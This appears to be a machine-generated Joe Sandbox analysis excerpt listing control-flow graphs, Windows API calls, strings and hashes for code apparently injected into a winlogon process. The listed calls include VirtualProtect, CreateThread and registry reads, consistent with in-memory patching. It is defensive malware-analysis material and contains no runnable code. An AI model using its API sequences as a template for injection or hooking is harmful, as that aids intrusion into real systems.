                                                          • Instruction Fuzzy Hash: 6DD1AE3A20CF9891DA70DB9AE49835A77A0F3C8B89F108156EACE47769DF3DC551CB04

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 226 225dc645810-225dc64583c 227 225dc64584d-225dc645856 226->227 228 225dc64583e-225dc645846 226->228 229 225dc645867-225dc645870 227->229 230 225dc645858-225dc645860 227->230 228->227 231 225dc645881-225dc64588a 229->231 232 225dc645872-225dc64587a 229->232 230->229 233 225dc64588c-225dc645891 231->233 234 225dc645896-225dc6458a1 GetCurrentThreadId 231->234 232->231 235 225dc645e13-225dc645e1a 233->235 236 225dc6458a3-225dc6458a8 234->236 237 225dc6458ad-225dc6458b4 234->237 236->235 238 225dc6458b6-225dc6458bc 237->238 239 225dc6458c1-225dc6458ca 237->239 238->235 240 225dc6458cc-225dc6458d1 239->240 241 225dc6458d6-225dc6458e2 239->241 240->235 242 225dc6458e4-225dc645909 241->242 243 225dc64590e-225dc645965 call 225dc645e20 * 2 241->243 242->235 248 225dc64597a-225dc645983 243->248 249 225dc645967-225dc64596e 243->249 252 225dc645995-225dc64599e 248->252 253 225dc645985-225dc645992 248->253 250 225dc645976 249->250 251 225dc645970 249->251 255 225dc6459e6-225dc6459ea 250->255 254 225dc6459f0-225dc6459f6 251->254 256 225dc6459b3-225dc6459d8 call 225dc647fa0 252->256 257 225dc6459a0-225dc6459b0 252->257 253->252 259 225dc645a25-225dc645a2b 254->259 260 225dc6459f8-225dc645a14 call 225dc644ad0 254->260 255->254 267 225dc645a6d-225dc645a82 call 225dc644400 256->267 268 225dc6459de 256->268 257->256 262 225dc645a55-225dc645a68 259->262 263 225dc645a2d-225dc645a4c call 225dc647fdc 259->263 260->259 269 225dc645a16-225dc645a1e 260->269 262->235 263->262 273 225dc645a91-225dc645a9a 267->273 274 225dc645a84-225dc645a8c 267->274 268->255 269->259 275 225dc645aac-225dc645afa call 225dc6540e0 273->275 276 225dc645a9c-225dc645aa9 273->276 274->255 279 225dc645b02-225dc645b0a 275->279 276->275 280 225dc645c17-225dc645c1f 279->280 281 225dc645b10-225dc645bfb call 225dc647b80 279->281 283 225dc645c21-225dc645c34 call 225dc644cd0 280->283 284 225dc645c63-225dc645c6b 280->284 292 225dc645bfd 281->292 293 225dc645bff-225dc645c0e call 225dc6447a0 281->293 298 225dc645c36 283->298 299 225dc645c38-225dc645c61 283->299 285 225dc645c77-225dc645c86 284->285 286 225dc645c6d-225dc645c75 284->286 290 225dc645c88 285->290 291 225dc645c8f 285->291 286->285 289 225dc645c94-225dc645ca1 286->289 295 225dc645ca3 289->295 296 225dc645ca4-225dc645cf9 call 225dc653a40 289->296 290->291 291->289 292->280 303 225dc645c12 293->303 304 225dc645c10 293->304 295->296 305 225dc645cfb-225dc645d03 296->305 306 225dc645d08-225dc645da1 call 225dc644c50 call 225dc644bb0 VirtualProtect 296->306 298->284 299->280 303->279 304->280 311 225dc645db1-225dc645e11 306->311 312 225dc645da3-225dc645da8 GetLastError 306->312 311->235 312->311
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: e54ed8d5981410d2d10d562d395602567931b9c6313d0845cabb15234d5347af
                                                          • Instruction ID: f6bc3099d3021d90f66284fc7764e0d02526fbd7d5bff5af9890d681d6bf729d
                                                          • Opcode Fuzzy Hash: e54ed8d5981410d2d10d562d395602567931b9c6313d0845cabb15234d5347af
                                                          • Instruction Fuzzy Hash: B802EA3621DB9496E7A0CB99F49435AB7A0F3C5795F108056EA8E87BA8DF7DC484CF00

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID:
                                                          • API String ID: 1092925422-0
                                                          • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction ID: 5ab4cc4c86de14b28b7657dd2b04d766b10610f425967c1e4ffea0a6bb593b99
                                                          • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction Fuzzy Hash: B511422A619B50A3EB649B69E40821E77B0FB44B81F148036DE4E03794EB7DC954C784
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000003.1989875649.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_3_225dc610000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Protect$AllocLibraryLoad
                                                          • String ID:
                                                          • API String ID: 3316853933-0
                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                          • Instruction ID: 7c9ff1a1260ec0b76c18c2d9cc77086b54c9427e4fe21390ef94f9dc999a9e53
                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                          • Instruction Fuzzy Hash: 399126BAB02E6097EF648F69D409B6DB391F754FABF54C1349E4A07788DA38D812C700

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Virtual$AllocQuery
                                                          • String ID:
                                                          • API String ID: 31662377-0
                                                          • Opcode ID: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                                          • Instruction ID: bf1d2617ca0dc1213d6708b6b1205c297df0a859e96066834d8f5fc5efb5be15
                                                          • Opcode Fuzzy Hash: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                                          • Instruction Fuzzy Hash: BD314F2621DE90A1EA30DBADE45932B72A4F389789F108565E6CF07B98DF3CC180CB04

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32 ref: 00000225DC643A35
                                                          • PathFindFileNameW.SHLWAPI ref: 00000225DC643A44
                                                            • Part of subcall function 00000225DC643F88: StrCmpNIW.SHLWAPI(?,?,?,00000225DC64272F), ref: 00000225DC643FA0
                                                            • Part of subcall function 00000225DC643EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643EDB
                                                            • Part of subcall function 00000225DC643EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643F0E
                                                            • Part of subcall function 00000225DC643EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643F2E
                                                            • Part of subcall function 00000225DC643EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643F47
                                                            • Part of subcall function 00000225DC643EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000225DC643A5B), ref: 00000225DC643F68
                                                          • CreateThread.KERNELBASE ref: 00000225DC643A8B
                                                            • Part of subcall function 00000225DC641E74: GetCurrentThread.KERNEL32 ref: 00000225DC641E7F
                                                            • Part of subcall function 00000225DC641E74: CreateThread.KERNELBASE ref: 00000225DC642043
                                                            • Part of subcall function 00000225DC641E74: TlsAlloc.KERNEL32 ref: 00000225DC642049
                                                            • Part of subcall function 00000225DC641E74: TlsAlloc.KERNEL32 ref: 00000225DC642055
                                                            • Part of subcall function 00000225DC641E74: TlsAlloc.KERNEL32 ref: 00000225DC642061
                                                            • Part of subcall function 00000225DC641E74: TlsAlloc.KERNEL32 ref: 00000225DC64206D
                                                            • Part of subcall function 00000225DC641E74: TlsAlloc.KERNEL32 ref: 00000225DC642079
                                                            • Part of subcall function 00000225DC641E74: TlsAlloc.KERNEL32 ref: 00000225DC642085
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                                          • String ID:
                                                          • API String ID: 2779030803-0
                                                          • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                          • Instruction ID: 130d4905f5eea26d9371d1b1ff51420db667a30803bfba8bb2bd091ed1f53f6f
                                                          • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                          • Instruction Fuzzy Hash: F611B13D66CE29B2FB60ABEDE54D7AD3290AB84B47F50C0B99507811D0EF3DC484C600

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                          • String ID:
                                                          • API String ID: 3733156554-0
                                                          • Opcode ID: b3b9d40e5005b69779f21a3a3f4c2159e48617e69c58b355d88cafa2766b084c
                                                          • Instruction ID: d45715ff951a902dcb5778469b34ec2c1c793993c87c33ab114304a363d5f69f
                                                          • Opcode Fuzzy Hash: b3b9d40e5005b69779f21a3a3f4c2159e48617e69c58b355d88cafa2766b084c
                                                          • Instruction Fuzzy Hash: 8DF0173A22DE5491D6309B99E45935A77A1E388BD5F148151FA8E47B69DA38C680CF00

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00000225DC641724: GetProcessHeap.KERNEL32 ref: 00000225DC64172F
                                                            • Part of subcall function 00000225DC641724: HeapAlloc.KERNEL32 ref: 00000225DC64173E
                                                            • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC6417AE
                                                            • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC6417DB
                                                            • Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC6417F5
                                                            • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC641815
                                                            • Part of subcall function 00000225DC641724: RegCloseKey.KERNELBASE ref: 00000225DC641830
                                                            • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC641850
                                                            • Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC64186B
                                                            • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC64188B
                                                            • Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC6418A6
                                                            • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC6418C6
                                                          • SleepEx.KERNELBASE ref: 00000225DC641BDF
                                                            • Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC6418E1
                                                            • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC641901
                                                            • Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC64191C
                                                            • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC64193C
                                                            • Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC641957
                                                            • Part of subcall function 00000225DC641724: RegOpenKeyExW.KERNELBASE ref: 00000225DC641977
                                                            • Part of subcall function 00000225DC641724: RegCloseKey.ADVAPI32 ref: 00000225DC641992
                                                            • Part of subcall function 00000225DC641724: RegCloseKey.KERNELBASE ref: 00000225DC64199C
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen$Heap$AllocProcessSleep
                                                          • String ID:
                                                          • API String ID: 948135145-0
                                                          • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                          • Instruction ID: 12f4e7bf2d043a765a3ac4f019d2c82d455fc7f3fa1118b40d32223ae48c856c
                                                          • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                          • Instruction Fuzzy Hash: 363135AD32CE61A1FB549BAED9583A933A4EB44BC6F04D4A18E0B973D5DF38C850C214

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 408 225dc64f370-225dc64f39f VirtualProtect
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                          • Instruction ID: 91454ba34573355ff24e871c1f84efd327f9d9e1a896de9ceab491d5d3354271
                                                          • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                          • Instruction Fuzzy Hash: 4CD01229735950D3E300DF61D8497966328F39C702FD08005E98A82694DF7CC259CB50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 409 225dc67f370-225dc67f39f VirtualProtect
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                          • Instruction ID: a9a0868b07df84503d79fe2f89049b18ceebf10007afb1c3b1b6b2ac5b3c783d
                                                          • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                          • Instruction Fuzzy Hash: 91D01229731950D3F300DF51D8497956328F79C702FD08005E94AC6694DF7CC259CB51

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 410 225dc6af370-225dc6af39f VirtualProtect
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                          • Instruction ID: 7ad5aa38df14319b72f9190a8d26a325408e50eb3bc4bc849056c1e3cb0de339
                                                          • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                          • Instruction Fuzzy Hash: 27D01229731950D3E300DF51D8497D56329F3AC702FC08005E94AC2694DF7CC259CB50
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: AllocHeap
                                                          • String ID:
                                                          • API String ID: 4292702814-0
                                                          • Opcode ID: 065a3c227d1033dd624f9406cc348b017554f0f94b7651207c823ad3d34cd8d2
                                                          • Instruction ID: 8c995a941c99dfe8ec91a527983bcfb77f5d6b3f54302bc86fbf6d4b88a72ef6
                                                          • Opcode Fuzzy Hash: 065a3c227d1033dd624f9406cc348b017554f0f94b7651207c823ad3d34cd8d2
                                                          • Instruction Fuzzy Hash: D1F0B42C306E20B1FF9597ED580C3A412905F99B42F1CDC308E1A8ABC5ED3CC58AC211
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                          • Instruction ID: 434cbdb0f9c44be8f859e6a92bb332e08f0fb24b8a9ab8c877c5839079a85e8b
                                                          • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                          • Instruction Fuzzy Hash: 21B1B27A22CEA8A2EB599FADD408799B3A5F744F86F10D066EE0A53794DF35CC40C340
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                          • Instruction ID: 6e2edb3a058edf7ed16c8ea7a48cfc632efee82860856a5fe71e9e4b8278a0fc
                                                          • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                          • Instruction Fuzzy Hash: 8FB19D7A214EB0A6EB648FADD448799A3A4FB44F96F609426EE0957FD4DF35CC40C340
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                          • Instruction ID: fa57540a22b82042d2a169ee5b25633e73edf16a6416a5946321ed9c7ec9782f
                                                          • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                          • Instruction Fuzzy Hash: 27B1A06A214EA0A2EB64CFAED5087A9B7A5F744F86F64D026EE09D3794DF35CD40C340
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                          • Instruction ID: c02b42a4faf89e14a8460b6a51616ff0cfb1c70cf6853425f447978ae3c739dd
                                                          • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                          • Instruction Fuzzy Hash: 87318476219F90D6EB608FA4E8483EE7364F788749F54812ADB4E47B98EF38C548C710
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
